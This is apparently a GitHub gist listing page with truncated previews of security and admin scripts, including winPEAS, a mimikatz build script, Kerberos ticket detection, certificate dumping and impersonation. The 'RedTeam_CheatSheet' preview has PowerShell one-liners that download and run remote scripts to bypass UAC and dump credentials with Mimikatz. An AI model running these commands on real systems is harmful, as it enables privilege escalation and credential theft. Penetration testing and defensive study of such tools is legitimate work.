[email protected] / @JonTheNiceGuy / @g7vri
- Introduction
Jon Knepp jonknepp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-winPEAS | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $true)] | |
| [ValidateNotNullorEmpty()] | |
| [String] | |
| $Command | |
| ) |
thesubtlety
/ gist:5d30bc04f087807d817cf4479a481c23
Last active
March 27, 2025 18:30
Download compile and encrypt the latest mimikatz
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #requires -version 2 | |
| <# | |
| Author: Noah | |
| @subTee's reflexive loader | |
| Required Dependencies: msbuild, csc | |
| Execute: Run-UpdateKatz -Verbose |
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
jaredcatkinson
/ Get-KerberosTicketGrantingTicket.ps1
Last active
July 19, 2025 16:52
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
JayH5
/ acme-cert-dump-all.py
Created
November 29, 2016 13:51
Dump all certificates from Traefik's acme.json to .pem files
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import base64 | |
| import json | |
| import os | |
| def main(): | |
| parser = argparse.ArgumentParser( | |
| description="Dump all certificates out of Traefik's acme.json file") |
emory
/ nessus-merge.py
Created
February 1, 2012 15:05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3.2 | |
| import xml.etree.ElementTree as etree | |
| import shutil | |
| import os | |
| first = 1 | |
| for fileName in os.listdir("."): | |
| if ".nessus" in fileName: | |
| print(":: Parsing", fileName) |
idavis
/ Use-Impersonation.ps1
Created
March 5, 2011 18:52
Impersonate a user and execute a script block as that user
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| param( [ScriptBlock] $scriptBlock ) | |
| <# | |
| .SYNOPSIS | |
| Impersonates a user and executes a script block as that user. This is an interactive script | |
| and a window will open in order to securely capture credentials. | |
| .EXAMPLE | |
| Use-Impersonation.ps1 {Get-ChildItem 'C:\' | Foreach { Write-Host $_.Name }} | |
| This writes the contents of 'C:\' impersonating the user that is entered. | |
| #> | |